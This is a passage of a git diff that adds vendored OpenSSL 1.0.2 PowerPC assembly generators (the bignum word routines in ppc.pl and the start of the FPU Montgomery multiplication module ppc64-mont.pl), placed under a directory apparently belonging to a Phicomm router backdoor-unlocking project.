+	$UMULL	r12,r9,r8		#th = q*dh
+	$CLRU	r10,r5,`$BITS/2`	#r10=dl
+	$UMULL	r6,r8,r10		#tl = q*dl
+	
+Lppcasm_divinnerloop:
+	subf	r10,r12,r3		#t = h -th
+	$SHRI	r7,r10,`$BITS/2`	#r7= (t &BN_MASK2H), sort of...
+	addic.	r7,r7,0			#test if r7 == 0. used below.
+					# now want to compute
+					# r7 = (t<<BN_BITS4)|((l&BN_MASK2h)>>BN_BITS4)
+					# the following 2 instructions do that
+	$SHLI	r7,r10,`$BITS/2`	# r7 = (t<<BN_BITS4)
+	or	r7,r7,r11		# r7|=((l&BN_MASK2h)>>BN_BITS4)
+	$UCMP	cr1,r6,r7		# compare (tl <= r7)
+	bne	Lppcasm_divinnerexit
+	ble	cr1,Lppcasm_divinnerexit
+	addi	r8,r8,-1		#q--
+	subf	r12,r9,r12		#th -=dh
+	$CLRU	r10,r5,`$BITS/2`	#r10=dl. t is no longer needed in loop.
+	subf	r6,r10,r6		#tl -=dl
+	b	Lppcasm_divinnerloop
+Lppcasm_divinnerexit:
+	$SHRI	r10,r6,`$BITS/2`	#t=(tl>>BN_BITS4)
+	$SHLI	r11,r6,`$BITS/2`	#tl=(tl<<BN_BITS4)&BN_MASK2h;
+	$UCMP	cr1,r4,r11		# compare l and tl
+	add	r12,r12,r10		# th+=t
+	bge	cr1,Lppcasm_div7	# if (l>=tl) goto Lppcasm_div7
+	addi	r12,r12,1		# th++
+Lppcasm_div7:
+	subf	r11,r11,r4		#r11=l-tl
+	$UCMP	cr1,r3,r12		#compare h and th
+	bge	cr1,Lppcasm_div8	#if (h>=th) goto Lppcasm_div8
+	addi	r8,r8,-1		# q--
+	add	r3,r5,r3		# h+=d
+Lppcasm_div8:
+	subf	r12,r12,r3		#r12 = h-th
+	$SHLI	r4,r11,`$BITS/2`	#l=(l&BN_MASK2l)<<BN_BITS4
+					# want to compute
+					# h = ((h<<BN_BITS4)|(l>>BN_BITS4))&BN_MASK2
+					# the following 2 instructions will do this.
+	$INSR	r11,r12,`$BITS/2`,`$BITS/2`	# r11 is the value we want rotated $BITS/2.
+	$ROTL	r3,r11,`$BITS/2`	# rotate by $BITS/2 and store in r3
+	bdz	Lppcasm_div9		#if (count==0) break ;
+	$SHLI	r0,r8,`$BITS/2`		#ret =q<<BN_BITS4
+	b	Lppcasm_divouterloop
+Lppcasm_div9:
+	or	r3,r8,r0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,3,0
+	.long	0
+.size	.bn_div_words,.-.bn_div_words
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_sqr_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+.align	4
+.bn_sqr_words:
+#
+#	Optimized version of bn_sqr_words
+#
+#	void bn_sqr_words(BN_ULONG *r, BN_ULONG *a, int n)
+#
+#	r3 = r
+#	r4 = a
+#	r5 = n
+#
+#	r6 = a[i].
+#	r7,r8 = product.
+#
+#	No unrolling done here. Not performance critical.
+
+	addic.	r5,r5,0			#test r5.
+	beq	Lppcasm_sqr_adios
+	addi	r4,r4,-$BNSZ
+	addi	r3,r3,-$BNSZ
+	mtctr	r5
+Lppcasm_sqr_mainloop:	
+					#sqr(r[0],r[1],a[0]);
+	$LDU	r6,$BNSZ(r4)
+	$UMULL	r7,r6,r6
+	$UMULH  r8,r6,r6
+	$STU	r7,$BNSZ(r3)
+	$STU	r8,$BNSZ(r3)
+	bdnz-	Lppcasm_sqr_mainloop
+Lppcasm_sqr_adios:	
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,3,0
+	.long	0
+.size	.bn_sqr_words,.-.bn_sqr_words
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_mul_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4	
+.bn_mul_words:
+#
+# BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+#
+# r3 = rp
+# r4 = ap
+# r5 = num
+# r6 = w
+	xor	r0,r0,r0
+	xor	r12,r12,r12		# used for carry
+	rlwinm.	r7,r5,30,2,31		# num >> 2
+	beq	Lppcasm_mw_REM
+	mtctr	r7
+Lppcasm_mw_LOOP:	
+					#mul(rp[0],ap[0],w,c1);
+	$LD	r8,`0*$BNSZ`(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	addc	r9,r9,r12
+	#addze	r10,r10			#carry is NOT ignored.
+					#will be taken care of
+					#in second spin below
+					#using adde.
+	$ST	r9,`0*$BNSZ`(r3)
+					#mul(rp[1],ap[1],w,c1);
+	$LD	r8,`1*$BNSZ`(r4)	
+	$UMULL	r11,r6,r8
+	$UMULH  r12,r6,r8
+	adde	r11,r11,r10
+	#addze	r12,r12
+	$ST	r11,`1*$BNSZ`(r3)
+					#mul(rp[2],ap[2],w,c1);
+	$LD	r8,`2*$BNSZ`(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	adde	r9,r9,r12
+	#addze	r10,r10
+	$ST	r9,`2*$BNSZ`(r3)
+					#mul_add(rp[3],ap[3],w,c1);
+	$LD	r8,`3*$BNSZ`(r4)
+	$UMULL	r11,r6,r8
+	$UMULH  r12,r6,r8
+	adde	r11,r11,r10
+	addze	r12,r12			#this spin we collect carry into
+					#r12
+	$ST	r11,`3*$BNSZ`(r3)
+	
+	addi	r3,r3,`4*$BNSZ`
+	addi	r4,r4,`4*$BNSZ`
+	bdnz-	Lppcasm_mw_LOOP
+
+Lppcasm_mw_REM:
+	andi.	r5,r5,0x3
+	beq	Lppcasm_mw_OVER
+					#mul(rp[0],ap[0],w,c1);
+	$LD	r8,`0*$BNSZ`(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	addc	r9,r9,r12
+	addze	r10,r10
+	$ST	r9,`0*$BNSZ`(r3)
+	addi	r12,r10,0
+	
+	addi	r5,r5,-1
+	cmpli	0,0,r5,0
+	beq	Lppcasm_mw_OVER
+
+	
+					#mul(rp[1],ap[1],w,c1);
+	$LD	r8,`1*$BNSZ`(r4)	
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	addc	r9,r9,r12
+	addze	r10,r10
+	$ST	r9,`1*$BNSZ`(r3)
+	addi	r12,r10,0
+	
+	addi	r5,r5,-1
+	cmpli	0,0,r5,0
+	beq	Lppcasm_mw_OVER
+	
+					#mul_add(rp[2],ap[2],w,c1);
+	$LD	r8,`2*$BNSZ`(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	addc	r9,r9,r12
+	addze	r10,r10
+	$ST	r9,`2*$BNSZ`(r3)
+	addi	r12,r10,0
+		
+Lppcasm_mw_OVER:	
+	addi	r3,r12,0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,4,0
+	.long	0
+.size	bn_mul_words,.-bn_mul_words
+
+#
+#	NOTE:	The following label name should be changed to
+#		"bn_mul_add_words" i.e. remove the first dot
+#		for the gcc compiler. This should be automatically
+#		done in the build
+#
+
+.align	4
+.bn_mul_add_words:
+#
+# BN_ULONG bn_mul_add_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
+#
+# r3 = rp
+# r4 = ap
+# r5 = num
+# r6 = w
+#
+# empirical evidence suggests that unrolled version performs best!!
+#
+	xor	r0,r0,r0		#r0 = 0
+	xor	r12,r12,r12  		#r12 = 0 . used for carry		
+	rlwinm.	r7,r5,30,2,31		# num >> 2
+	beq	Lppcasm_maw_leftover	# if (num < 4) go LPPCASM_maw_leftover
+	mtctr	r7
+Lppcasm_maw_mainloop:	
+					#mul_add(rp[0],ap[0],w,c1);
+	$LD	r8,`0*$BNSZ`(r4)
+	$LD	r11,`0*$BNSZ`(r3)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	addc	r9,r9,r12		#r12 is carry.
+	addze	r10,r10
+	addc	r9,r9,r11
+	#addze	r10,r10
+					#the above instruction addze
+					#is NOT needed. Carry will NOT
+					#be ignored. It's not affected
+					#by multiply and will be collected
+					#in the next spin
+	$ST	r9,`0*$BNSZ`(r3)
+	
+					#mul_add(rp[1],ap[1],w,c1);
+	$LD	r8,`1*$BNSZ`(r4)	
+	$LD	r9,`1*$BNSZ`(r3)
+	$UMULL	r11,r6,r8
+	$UMULH  r12,r6,r8
+	adde	r11,r11,r10		#r10 is carry.
+	addze	r12,r12
+	addc	r11,r11,r9
+	#addze	r12,r12
+	$ST	r11,`1*$BNSZ`(r3)
+	
+					#mul_add(rp[2],ap[2],w,c1);
+	$LD	r8,`2*$BNSZ`(r4)
+	$UMULL	r9,r6,r8
+	$LD	r11,`2*$BNSZ`(r3)
+	$UMULH  r10,r6,r8
+	adde	r9,r9,r12
+	addze	r10,r10
+	addc	r9,r9,r11
+	#addze	r10,r10
+	$ST	r9,`2*$BNSZ`(r3)
+	
+					#mul_add(rp[3],ap[3],w,c1);
+	$LD	r8,`3*$BNSZ`(r4)
+	$UMULL	r11,r6,r8
+	$LD	r9,`3*$BNSZ`(r3)
+	$UMULH  r12,r6,r8
+	adde	r11,r11,r10
+	addze	r12,r12
+	addc	r11,r11,r9
+	addze	r12,r12
+	$ST	r11,`3*$BNSZ`(r3)
+	addi	r3,r3,`4*$BNSZ`
+	addi	r4,r4,`4*$BNSZ`
+	bdnz-	Lppcasm_maw_mainloop
+	
+Lppcasm_maw_leftover:
+	andi.	r5,r5,0x3
+	beq	Lppcasm_maw_adios
+	addi	r3,r3,-$BNSZ
+	addi	r4,r4,-$BNSZ
+					#mul_add(rp[0],ap[0],w,c1);
+	mtctr	r5
+	$LDU	r8,$BNSZ(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	$LDU	r11,$BNSZ(r3)
+	addc	r9,r9,r11
+	addze	r10,r10
+	addc	r9,r9,r12
+	addze	r12,r10
+	$ST	r9,0(r3)
+	
+	bdz	Lppcasm_maw_adios
+					#mul_add(rp[1],ap[1],w,c1);
+	$LDU	r8,$BNSZ(r4)	
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	$LDU	r11,$BNSZ(r3)
+	addc	r9,r9,r11
+	addze	r10,r10
+	addc	r9,r9,r12
+	addze	r12,r10
+	$ST	r9,0(r3)
+	
+	bdz	Lppcasm_maw_adios
+					#mul_add(rp[2],ap[2],w,c1);
+	$LDU	r8,$BNSZ(r4)
+	$UMULL	r9,r6,r8
+	$UMULH  r10,r6,r8
+	$LDU	r11,$BNSZ(r3)
+	addc	r9,r9,r11
+	addze	r10,r10
+	addc	r9,r9,r12
+	addze	r12,r10
+	$ST	r9,0(r3)
+		
+Lppcasm_maw_adios:	
+	addi	r3,r12,0
+	blr
+	.long	0
+	.byte	0,12,0x14,0,0,0,4,0
+	.long	0
+.size	.bn_mul_add_words,.-.bn_mul_add_words
+	.align	4
+EOF
+$data =~ s/\`([^\`]*)\`/eval $1/gem;
+print $data;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc64-mont.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc64-mont.pl
new file mode 100644
index 0000000..68e3733
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/ppc64-mont.pl
@@ -0,0 +1,1626 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# December 2007
+
+# The reason for undertaken effort is basically following. Even though
+# Power 6 CPU operates at incredible 4.7GHz clock frequency, its PKI
+# performance was observed to be less than impressive, essentially as
+# fast as 1.8GHz PPC970, or 2.6 times(!) slower than one would hope.
+# Well, it's not surprising that IBM had to make some sacrifices to
+# boost the clock frequency that much, but no overall improvement?
+# Having observed how much difference did switching to FPU make on
+# UltraSPARC, playing same stunt on Power 6 appeared appropriate...
+# Unfortunately the resulting performance improvement is not as
+# impressive, ~30%, and in absolute terms is still very far from what
+# one would expect from 4.7GHz CPU. There is a chance that I'm doing
+# something wrong, but in the lack of assembler level micro-profiling
+# data or at least decent platform guide I can't tell... Or better
+# results might be achieved with VMX... Anyway, this module provides
+# *worse* performance on other PowerPC implementations, ~40-15% slower
+# on PPC970 depending on key length and ~40% slower on Power 5 for all
+# key lengths. As it's obviously inappropriate as "best all-round"
+# alternative, it has to be complemented with run-time CPU family
+# detection. Oh! It should also be noted that unlike other PowerPC
+# implementation IALU ppc-mont.pl module performs *suboptimaly* on
+# >=1024-bit key lengths on Power 6. It should also be noted that
+# *everything* said so far applies to 64-bit builds! As far as 32-bit
+# application executed on 64-bit CPU goes, this module is likely to
+# become preferred choice, because it's easy to adapt it for such
+# case and *is* faster than 32-bit ppc-mont.pl on *all* processors.
+
+# February 2008
+
+# Micro-profiling assisted optimization results in ~15% improvement
+# over original ppc64-mont.pl version, or overall ~50% improvement
+# over ppc.pl module on Power 6. If compared to ppc-mont.pl on same
+# Power 6 CPU, this module is 5-150% faster depending on key length,
+# [hereafter] more for longer keys. But if compared to ppc-mont.pl
+# on 1.8GHz PPC970, it's only 5-55% faster. Still far from impressive
+# in absolute terms, but it's apparently the way Power 6 is...
+
+# December 2009
+
+# Adapted for 32-bit build this module delivers 25-120%, yes, more
+# than *twice* for longer keys, performance improvement over 32-bit
+# ppc-mont.pl on 1.8GHz PPC970. However! This implementation utilizes
+# even 64-bit integer operations and the trouble is that most PPC
+# operating systems don't preserve upper halves of general purpose
+# registers upon 32-bit signal delivery. They do preserve them upon
+# context switch, but not signalling:-( This means that asynchronous
+# signals have to be blocked upon entry to this subroutine. Signal
+# masking (and of course complementary unmasking) has quite an impact
+# on performance, naturally larger for shorter keys. It's so severe
+# that 512-bit key performance can be as low as 1/3 of expected one.
+# This is why this routine can be engaged for longer key operations
+# only on these OSes, see crypto/ppccap.c for further details. MacOS X
+# is an exception from this and doesn't require signal masking, and
+# that's where above improvement coefficients were collected. For
+# others alternative would be to break dependence on upper halves of
+# GPRs by sticking to 32-bit integer operations...
+
+# December 2012
+
+# Remove above mentioned dependence on GPRs' upper halves in 32-bit
+# build. No signal masking overhead, but integer instructions are
+# *more* numerous... It's still "universally" faster than 32-bit
+# ppc-mont.pl, but improvement coefficient is not as impressive
+# for longer keys...
+
+$flavour = shift;
+
+if ($flavour =~ /32/) {
+	$SIZE_T=4;
+	$RZONE=	224;
+	$fname=	"bn_mul_mont_fpu64";
+
+	$STUX=	"stwux";	# store indexed and update
+	$PUSH=	"stw";
+	$POP=	"lwz";
+} elsif ($flavour =~ /64/) {
+	$SIZE_T=8;
+	$RZONE=	288;
+	$fname=	"bn_mul_mont_fpu64";
+
+	# same as above, but 64-bit mnemonics...
+	$STUX=	"stdux";	# store indexed and update
+	$PUSH=	"std";
+	$POP=	"ld";
+} else { die "nonsense $flavour"; }
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}ppc-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/ppc-xlate.pl" and -f $xlate) or
+die "can't locate ppc-xlate.pl";
+
+open STDOUT,"| $^X $xlate $flavour ".shift || die "can't call $xlate: $!";
+
+$FRAME=64;	# padded frame header
+$TRANSFER=16*8;
+
+$carry="r0";
+$sp="r1";
+$toc="r2";
+$rp="r3";	$ovf="r3";
+$ap="r4";
+$bp="r5";
+$np="r6";
+$n0="r7";
+$num="r8";
+$rp="r9";	# $rp is reassigned
+$tp="r10";
+$j="r11";
+$i="r12";
+# non-volatile registers
+$c1="r19";
+$n1="r20";
+$a1="r21";
+$nap_d="r22";	# interleaved ap and np in double format
+$a0="r23";	# ap[0]
+$t0="r24";	# temporary registers
+$t1="r25";
+$t2="r26";
+$t3="r27";
+$t4="r28";
+$t5="r29";
+$t6="r30";
+$t7="r31";
+
+# PPC offers enough register bank capacity to unroll inner loops twice
+#
+#     ..A3A2A1A0
+#           dcba
+#    -----------
+#            A0a
+#           A0b
+#          A0c
+#         A0d
+#          A1a
+#         A1b
+#        A1c
+#       A1d
+#        A2a
+#       A2b
+#      A2c
+#     A2d
+#      A3a
+#     A3b
+#    A3c
+#   A3d
+#    ..a
+#   ..b
+#
+$ba="f0";	$bb="f1";	$bc="f2";	$bd="f3";
+$na="f4";	$nb="f5";	$nc="f6";	$nd="f7";
+$dota="f8";	$dotb="f9";
+$A0="f10";	$A1="f11";	$A2="f12";	$A3="f13";
+$N0="f20";	$N1="f21";	$N2="f22";	$N3="f23";
+$T0a="f24";	$T0b="f25";
+$T1a="f26";	$T1b="f27";
+$T2a="f28";	$T2b="f29";
+$T3a="f30";	$T3b="f31";
+
+# sp----------->+-------------------------------+
+#		| saved sp			|
+#		+-------------------------------+
+#		.				.
+#   +64		+-------------------------------+
+#		| 16 gpr<->fpr transfer zone	|
+#		.				.
+#		.				.
+#   +16*8	+-------------------------------+
+#		| __int64 tmp[-1]		|
+#		+-------------------------------+
+#		| __int64 tmp[num]		|
+#		.				.
+#		.				.
+#		.				.
+#   +(num+1)*8	+-------------------------------+
+#		| padding to 64 byte boundary	|
+#		.				.
+#   +X		+-------------------------------+
+#		| double nap_d[4*num]		|
+#		.				.
+#		.				.
+#		.				.
+#		+-------------------------------+
+#		.				.
+#   -13*size_t	+-------------------------------+
+#		| 13 saved gpr, r19-r31		|
+#		.				.
+#		.				.
+#   -12*8	+-------------------------------+
+#		| 12 saved fpr, f20-f31		|
+#		.				.
+#		.				.
+#		+-------------------------------+
+
+$code=<<___;
+.machine "any"
+.text
+
+.globl	.$fname
+.align	5
+.$fname:
+	cmpwi	$num,`3*8/$SIZE_T`
+	mr	$rp,r3		; $rp is reassigned
+	li	r3,0		; possible "not handled" return code
+	bltlr-
+	andi.	r0,$num,`16/$SIZE_T-1`		; $num has to be "even"
+	bnelr-
+
+	slwi	$num,$num,`log($SIZE_T)/log(2)`	; num*=sizeof(BN_LONG)
+	li	$i,-4096
+	slwi	$tp,$num,2	; place for {an}p_{lh}[num], i.e. 4*num
+	add	$tp,$tp,$num	; place for tp[num+1]
+	addi	$tp,$tp,`$FRAME+$TRANSFER+8+64+$RZONE`
+	subf	$tp,$tp,$sp	; $sp-$tp
+	and	$tp,$tp,$i	; minimize TLB usage
+	subf	$tp,$sp,$tp	; $tp-$sp
+	mr	$i,$sp
+	$STUX	$sp,$sp,$tp	; alloca
+
+	$PUSH	r19,`-12*8-13*$SIZE_T`($i)
+	$PUSH	r20,`-12*8-12*$SIZE_T`($i)
+	$PUSH	r21,`-12*8-11*$SIZE_T`($i)
+	$PUSH	r22,`-12*8-10*$SIZE_T`($i)
+	$PUSH	r23,`-12*8-9*$SIZE_T`($i)
+	$PUSH	r24,`-12*8-8*$SIZE_T`($i)
+	$PUSH	r25,`-12*8-7*$SIZE_T`($i)
+	$PUSH	r26,`-12*8-6*$SIZE_T`($i)
+	$PUSH	r27,`-12*8-5*$SIZE_T`($i)
+	$PUSH	r28,`-12*8-4*$SIZE_T`($i)
+	$PUSH	r29,`-12*8-3*$SIZE_T`($i)
+	$PUSH	r30,`-12*8-2*$SIZE_T`($i)
+	$PUSH	r31,`-12*8-1*$SIZE_T`($i)
+	stfd	f20,`-12*8`($i)
+	stfd	f21,`-11*8`($i)
+	stfd	f22,`-10*8`($i)
+	stfd	f23,`-9*8`($i)
+	stfd	f24,`-8*8`($i)
+	stfd	f25,`-7*8`($i)
+	stfd	f26,`-6*8`($i)
+	stfd	f27,`-5*8`($i)
+	stfd	f28,`-4*8`($i)
+	stfd	f29,`-3*8`($i)
+	stfd	f30,`-2*8`($i)
+	stfd	f31,`-1*8`($i)
+
+	addi	$tp,$sp,`$FRAME+$TRANSFER+8+64`
+	li	$i,-64
+	add	$nap_d,$tp,$num
+	and	$nap_d,$nap_d,$i	; align to 64 bytes
+	; nap_d is off by 1, because it's used with stfdu/lfdu
+	addi	$nap_d,$nap_d,-8
+	srwi	$j,$num,`3+1`	; counter register, num/2
+	addi	$j,$j,-1
+	addi	$tp,$sp,`$FRAME+$TRANSFER-8`
+	li	$carry,0
+	mtctr	$j
+___
+
+$code.=<<___ if ($SIZE_T==8);
+	ld	$a0,0($ap)		; pull ap[0] value
+	ld	$t3,0($bp)		; bp[0]
+	ld	$n0,0($n0)		; pull n0[0] value
+
+	mulld	$t7,$a0,$t3		; ap[0]*bp[0]
+	; transfer bp[0] to FPU as 4x16-bit values
+	extrdi	$t0,$t3,16,48
+	extrdi	$t1,$t3,16,32
+	extrdi	$t2,$t3,16,16
+	extrdi	$t3,$t3,16,0
+	std	$t0,`$FRAME+0`($sp)
+	std	$t1,`$FRAME+8`($sp)
+	std	$t2,`$FRAME+16`($sp)
+	std	$t3,`$FRAME+24`($sp)
+
+	mulld	$t7,$t7,$n0		; tp[0]*n0
+	; transfer (ap[0]*bp[0])*n0 to FPU as 4x16-bit values
+	extrdi	$t4,$t7,16,48
+	extrdi	$t5,$t7,16,32
+	extrdi	$t6,$t7,16,16
+	extrdi	$t7,$t7,16,0
+	std	$t4,`$FRAME+32`($sp)
+	std	$t5,`$FRAME+40`($sp)
+	std	$t6,`$FRAME+48`($sp)
+	std	$t7,`$FRAME+56`($sp)
+
+	extrdi	$t0,$a0,32,32		; lwz	$t0,4($ap)
+	extrdi	$t1,$a0,32,0		; lwz	$t1,0($ap)
+	lwz	$t2,12($ap)		; load a[1] as 32-bit word pair
+	lwz	$t3,8($ap)
+	lwz	$t4,4($np)		; load n[0] as 32-bit word pair
+	lwz	$t5,0($np)
+	lwz	$t6,12($np)		; load n[1] as 32-bit word pair
+	lwz	$t7,8($np)
+___
+$code.=<<___ if ($SIZE_T==4);
+	lwz	$a0,0($ap)		; pull ap[0,1] value
+	mr	$n1,$n0
+	lwz	$a1,4($ap)
+	li	$c1,0
+	lwz	$t1,0($bp)		; bp[0,1]
+	lwz	$t3,4($bp)
+	lwz	$n0,0($n1)		; pull n0[0,1] value
+	lwz	$n1,4($n1)
+
+	mullw	$t4,$a0,$t1		; mulld ap[0]*bp[0]
+	mulhwu	$t5,$a0,$t1
+	mullw	$t6,$a1,$t1
+	mullw	$t7,$a0,$t3
+	add	$t5,$t5,$t6
+	add	$t5,$t5,$t7
+	; transfer bp[0] to FPU as 4x16-bit values
+	extrwi	$t0,$t1,16,16
+	extrwi	$t1,$t1,16,0
+	extrwi	$t2,$t3,16,16
+	extrwi	$t3,$t3,16,0
+	std	$t0,`$FRAME+0`($sp)	; yes, std in 32-bit build
+	std	$t1,`$FRAME+8`($sp)
+	std	$t2,`$FRAME+16`($sp)
+	std	$t3,`$FRAME+24`($sp)
+
+	mullw	$t0,$t4,$n0		; mulld tp[0]*n0
+	mulhwu	$t1,$t4,$n0
+	mullw	$t2,$t5,$n0
+	mullw	$t3,$t4,$n1
+	add	$t1,$t1,$t2
+	add	$t1,$t1,$t3
+	; transfer (ap[0]*bp[0])*n0 to FPU as 4x16-bit values
+	extrwi	$t4,$t0,16,16
+	extrwi	$t5,$t0,16,0
+	extrwi	$t6,$t1,16,16
+	extrwi	$t7,$t1,16,0
+	std	$t4,`$FRAME+32`($sp)	; yes, std in 32-bit build
+	std	$t5,`$FRAME+40`($sp)
+	std	$t6,`$FRAME+48`($sp)
+	std	$t7,`$FRAME+56`($sp)
+
+	mr	$t0,$a0			; lwz	$t0,0($ap)
+	mr	$t1,$a1			; lwz	$t1,4($ap)
+	lwz	$t2,8($ap)		; load a[j..j+3] as 32-bit word pairs
+	lwz	$t3,12($ap)
+	lwz	$t4,0($np)		; load n[j..j+3] as 32-bit word pairs
+	lwz	$t5,4($np)
+	lwz	$t6,8($np)
+	lwz	$t7,12($np)
+___
+$code.=<<___;
+	lfd	$ba,`$FRAME+0`($sp)
+	lfd	$bb,`$FRAME+8`($sp)
+	lfd	$bc,`$FRAME+16`($sp)
+	lfd	$bd,`$FRAME+24`($sp)
+	lfd	$na,`$FRAME+32`($sp)
+	lfd	$nb,`$FRAME+40`($sp)
+	lfd	$nc,`$FRAME+48`($sp)
+	lfd	$nd,`$FRAME+56`($sp)
+	std	$t0,`$FRAME+64`($sp)	; yes, std even in 32-bit build
+	std	$t1,`$FRAME+72`($sp)
+	std	$t2,`$FRAME+80`($sp)
+	std	$t3,`$FRAME+88`($sp)
+	std	$t4,`$FRAME+96`($sp)
+	std	$t5,`$FRAME+104`($sp)
+	std	$t6,`$FRAME+112`($sp)
+	std	$t7,`$FRAME+120`($sp)
+	fcfid	$ba,$ba
+	fcfid	$bb,$bb
+	fcfid	$bc,$bc
+	fcfid	$bd,$bd
+	fcfid	$na,$na
+	fcfid	$nb,$nb
+	fcfid	$nc,$nc
+	fcfid	$nd,$nd
+
+	lfd	$A0,`$FRAME+64`($sp)
+	lfd	$A1,`$FRAME+72`($sp)
+	lfd	$A2,`$FRAME+80`($sp)
+	lfd	$A3,`$FRAME+88`($sp)
+	lfd	$N0,`$FRAME+96`($sp)
+	lfd	$N1,`$FRAME+104`($sp)
+	lfd	$N2,`$FRAME+112`($sp)
+	lfd	$N3,`$FRAME+120`($sp)
+	fcfid	$A0,$A0
+	fcfid	$A1,$A1
+	fcfid	$A2,$A2
+	fcfid	$A3,$A3
+	fcfid	$N0,$N0
+	fcfid	$N1,$N1
+	fcfid	$N2,$N2
+	fcfid	$N3,$N3
+	addi	$ap,$ap,16
+	addi	$np,$np,16
+
+	fmul	$T1a,$A1,$ba
+	fmul	$T1b,$A1,$bb
+	stfd	$A0,8($nap_d)		; save a[j] in double format
+	stfd	$A1,16($nap_d)
+	fmul	$T2a,$A2,$ba
+	fmul	$T2b,$A2,$bb
+	stfd	$A2,24($nap_d)		; save a[j+1] in double format
+	stfd	$A3,32($nap_d)
+	fmul	$T3a,$A3,$ba
+	fmul	$T3b,$A3,$bb
+	stfd	$N0,40($nap_d)		; save n[j] in double format
+	stfd	$N1,48($nap_d)
+	fmul	$T0a,$A0,$ba
+	fmul	$T0b,$A0,$bb
+	stfd	$N2,56($nap_d)		; save n[j+1] in double format
+	stfdu	$N3,64($nap_d)
+
+	fmadd	$T1a,$A0,$bc,$T1a
+	fmadd	$T1b,$A0,$bd,$T1b
+	fmadd	$T2a,$A1,$bc,$T2a
+	fmadd	$T2b,$A1,$bd,$T2b
+	fmadd	$T3a,$A2,$bc,$T3a
+	fmadd	$T3b,$A2,$bd,$T3b
+	fmul	$dota,$A3,$bc
+	fmul	$dotb,$A3,$bd
+
+	fmadd	$T1a,$N1,$na,$T1a
+	fmadd	$T1b,$N1,$nb,$T1b
+	fmadd	$T2a,$N2,$na,$T2a
+	fmadd	$T2b,$N2,$nb,$T2b
+	fmadd	$T3a,$N3,$na,$T3a
+	fmadd	$T3b,$N3,$nb,$T3b
+	fmadd	$T0a,$N0,$na,$T0a
+	fmadd	$T0b,$N0,$nb,$T0b
+
+	fmadd	$T1a,$N0,$nc,$T1a
+	fmadd	$T1b,$N0,$nd,$T1b
+	fmadd	$T2a,$N1,$nc,$T2a
+	fmadd	$T2b,$N1,$nd,$T2b
+	fmadd	$T3a,$N2,$nc,$T3a
+	fmadd	$T3b,$N2,$nd,$T3b
+	fmadd	$dota,$N3,$nc,$dota
+	fmadd	$dotb,$N3,$nd,$dotb
+
+	fctid	$T0a,$T0a
+	fctid	$T0b,$T0b
+	fctid	$T1a,$T1a
+	fctid	$T1b,$T1b
+	fctid	$T2a,$T2a
+	fctid	$T2b,$T2b
+	fctid	$T3a,$T3a
+	fctid	$T3b,$T3b
+
+	stfd	$T0a,`$FRAME+0`($sp)
+	stfd	$T0b,`$FRAME+8`($sp)
+	stfd	$T1a,`$FRAME+16`($sp)
+	stfd	$T1b,`$FRAME+24`($sp)
+	stfd	$T2a,`$FRAME+32`($sp)
+	stfd	$T2b,`$FRAME+40`($sp)
+	stfd	$T3a,`$FRAME+48`($sp)
+	stfd	$T3b,`$FRAME+56`($sp)
+
+.align	5
+L1st:
+___
+$code.=<<___ if ($SIZE_T==8);
+	lwz	$t0,4($ap)		; load a[j] as 32-bit word pair
+	lwz	$t1,0($ap)
+	lwz	$t2,12($ap)		; load a[j+1] as 32-bit word pair
+	lwz	$t3,8($ap)
+	lwz	$t4,4($np)		; load n[j] as 32-bit word pair
+	lwz	$t5,0($np)
+	lwz	$t6,12($np)		; load n[j+1] as 32-bit word pair
+	lwz	$t7,8($np)
+___
+$code.=<<___ if ($SIZE_T==4);
+	lwz	$t0,0($ap)		; load a[j..j+3] as 32-bit word pairs
+	lwz	$t1,4($ap)
+	lwz	$t2,8($ap)
+	lwz	$t3,12($ap)
+	lwz	$t4,0($np)		; load n[j..j+3] as 32-bit word pairs
+	lwz	$t5,4($np)
+	lwz	$t6,8($np)
+	lwz	$t7,12($np)
+___
+$code.=<<___;
+	std	$t0,`$FRAME+64`($sp)	; yes, std even in 32-bit build
+	std	$t1,`$FRAME+72`($sp)
+	std	$t2,`$FRAME+80`($sp)
+	std	$t3,`$FRAME+88`($sp)
+	std	$t4,`$FRAME+96`($sp)
+	std	$t5,`$FRAME+104`($sp)
+	std	$t6,`$FRAME+112`($sp)
+	std	$t7,`$FRAME+120`($sp)
+___
+if ($SIZE_T==8 or $flavour =~ /osx/) {
+$code.=<<___;
+	ld	$t0,`$FRAME+0`($sp)
+	ld	$t1,`$FRAME+8`($sp)
+	ld	$t2,`$FRAME+16`($sp)
+	ld	$t3,`$FRAME+24`($sp)
+	ld	$t4,`$FRAME+32`($sp)
+	ld	$t5,`$FRAME+40`($sp)
+	ld	$t6,`$FRAME+48`($sp)
